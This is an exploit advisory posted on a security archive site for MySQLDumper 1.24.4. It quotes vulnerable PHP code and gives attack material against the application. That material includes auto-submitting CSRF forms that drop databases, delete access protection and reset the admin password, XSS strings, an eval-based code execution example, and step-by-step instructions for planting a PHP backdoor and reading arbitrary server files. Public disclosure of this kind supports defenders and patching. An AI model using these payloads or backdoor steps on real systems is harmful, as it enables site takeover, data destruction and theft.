exploit the possibilities

MySQLDumper 1.24.4 LFI / XSS / CSRF / Code Execution / Traversal

MySQLDumper 1.24.4 LFI / XSS / CSRF / Code Execution / Traversal
Posted Apr 27, 2012
Authored by Akastep

MySQLDumper version 1.24.4 suffers from code execution, cross site request forgery, cross site scripting, local file inclusion, and directory traversal vulnerabilities.

tags | exploit, local, vulnerability, code execution, xss, file inclusion, csrf
MD5 | 568b012ba56a46dd489f0b6d555183ff

MySQLDumper 1.24.4 LFI / XSS / CSRF / Code Execution / Traversal

Change Mirror Download
Vulnerable Software: MySQLDumper Version 1.24.4
Downloaded from: http://sourceforge.net/projects/mysqldumper/files/
(MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *MySQLDumper1.24.4.zip)
About Software:
What is MySQLDumper ?
MySQLDumper is a PHP and Perl based tool for backing up MySQL databases.
You can easily dump your data into a backup file and - if needed - restore it.
It is especially suited for shared hosting webspaces, where you don't have shell access.
MySQLDumper is an open source project and released under the GNU-license.
Safe mode off
OS: Windows XP SP2 (32 bit)
PHP Version:
MYSQL: 5.5.23

Vuln Desc:
MySQLDumper Version 1.24.4 is prone to:
LFI,XSS,CSRF,PHP CODE ExeCution,traversal,Info Disclosure vulns.

Local File Inclusion
/* Vulnerable COde Section

if (!@ob_start("ob_gzhandler")) @ob_start();
foreach ($_GET as $getvar=>$getval)
foreach ($_POST as $postvar=>$postval)
include_once ( './inc/functions.php' );
include_once ( './inc/mysql.php' );
include_once ( './inc/runtime.php' );
if (!isset($language)) $language="en";

include ( './language/lang_list.php' );
include ( 'language/' . $language . '/lang_install.php' );
include ( 'language/' . $language . '/lang_main.php' );
include ( 'language/' . $language . '/lang_config_overview.php' );


XSS on inputs via $_POST;
/*VUlnerable code section
if (!@ob_start("ob_gzhandler")) @ob_start();
include ('./inc/functions.php');
$page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php';
if (!file_exists("./work/config/mysqldumper.php"))
header("location: install.php");
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Author" content="Daniel Schlichtholz">

<frameset border=0 cols="190,*">
<frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize
frameborder="0" marginwidth="0" marginheight="0">
<frame name="MySQL_Dumper_content" src="<?php
echo $page; // <=here is
scrolling="auto" frameborder="0" marginwidth="0" marginheight="0">


XSS via $_GET;%3C/script%3E&language=en&submit=Installation;%3C/script%3E;%3C/script%3E&tablename=1;%3C/script%3E

CSRF Delete application protection via $_GET
<img src="" />

*After this Application will become fully unprotected from World.*

CSRF Drop database:

<img src="http://localhost/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">

kill0 is always information_schema (obviously you can't drop it)
Try to increment that index
in ex:
kill1 etc.

CSRF Uninstall Application via $_GET
or (This will delete existing config.php file)

CSRF change password:

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="">
<input name="username" id="username" type="text" value="pwnyou" />
<input name="userpass1" id="userpass1" type="text" value="pwnyou" />
<input name="userpass2" id="userpass2" type="text" value="pwnyou" />
<!--SHA1 (all Systems) -->
<input type="radio" name="type" id="type2" value="2" checked="checked" >


CSRF:Execute SQL commands via $_GET
In eg:( Create Denial Of Service Condition)
<img src=",md5%28now%28%29%29%29--" heigth="0" width="0" />

After gain access to application (in eg: after successfully exploitation CSRF via delete protection technique)
remote attacker can use this techniques to upload his/her backdoor.
As result this will completely compromise site.
*Upload backdoor:*
Rename your backdoor on your pc to me.php.gz
Then switch to:
Upload it:
Then Switch to:
On input box called: File:
enter relative/absolute path to your uploaded me.php.gz (default ./work/backup/me.php.gz)
Click RELOAD button.
On inputbox called File: Change file extension to:
Click save button and Vuala you have your own backdoor there.
You can find it:

Same tehcnique can be used without upload any file:
Todo so:
Switch to

Enter non existent file name on input called File:
in eg:
Click reload button.
it will ask *Create it?*
Click *Create* Button.
Copy paste your backdoor content to textarea and Click Save button.

Same technique can be used to add CUSTOM .htaccess Handler (to execute backdoor in eg: as *.gif file)

*NOTE* Second technique can be used by attacker to overwrite existing files./read arbitraty files on site/server.

Theris also chance to execute our code using eval PHP language *construct*.
We have PHP Code ExeCution here:

Vulnerable code section:
if (isset($_POST['selected_config'])||isset($_GET['config']))
if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
// Configuration was switched in content frame?
if (isset($_GET['config'])) $new_config=$_GET['config'];
// restore the last active menuitem
if (is_readable($config['paths']['config'].$new_config.'.php'))
if (read_config($new_config))
$_SESSION['config_file']=$new_config; //$config['config_file'];
<script language="JavaScript" type="text/javascript">
if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
else selected_div=\'\';
if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern

As you can see we can traverse it +

if we will look to read_config() function

function read_config($file=false)
global $config,$databases;
if (!$file) $file=$config['config_file'];
// protect from including external files
$search=array(':', 'http', 'ftp', ' ');
$replace=array('', '', '', '');

if (is_readable($config['paths']['config'].$file.'.php'))
// to prevent modern server from caching the new configuration we need to evaluate it this way
return $ret;

this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))

Our exploit:
where ss = ss.php
#cat ss.php # in eg attacker uploaded his/her own file:
echo 'Our command executed ' . getcwd();

Print screen:

Theris also a lot of CROSS Site Scripting Vulnerabilities: (XSS)
Switch to:

select '<script>alert(1);</script>'

and click Execute SQL Statement.

/*Vulnerable Code Section:
if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true;
include ('./inc/header.php');
include_once ('./language/'.$config['language'].'/lang.php');
include_once ('./language/'.$config['language'].'/lang_filemanagement.php');
include_once ('./language/'.$config['language'].'/lang_config_overview.php');
include_once ('./language/'.$config['language'].'/lang_main.php');
include_once ('./inc/functions_files.php');
include_once ('./inc/functions_sql.php');
if ($config['auto_delete']==1) $msg=AutoDelete();
get_sql_encodings(); // get possible sql charsets and also get default charset
//0=Datenbank 1=Struktur
$action=(isset($_GET['action'])) ? $_GET['action'] : 'files';
$kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0;
$expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1;
$selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : "";
$destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : "";
$compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : "";
$dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : "";
$dk=str_replace(':','|',$dk); // remove : because of statusline
$dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']);
$dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? $config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0;

if ($action=='dl')
// Download of a backup file wanted
if (is_readable($file))
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: '.(string) filesize($file));
while (!feof($file))
print fread($file,round(100*1024));



This technique can be used by attacker to download arbitraty files from site/server.
Print screen:

Information Disclosure:
Try to Direct access to this file:
Generates a lot of Notice's.
Generates a lot of Notice's.
Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147

NOTE: May be previous versions too affected but not tested.

================================ EOF ======================================

+++++++Greetz to all++++++++++
securtiyvulns.com and
to all AA Team.
Thank you.

/AkaStep ^_^
Live 1335567729

Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2020 Packet Storm. All rights reserved.

Security Services
Hosting By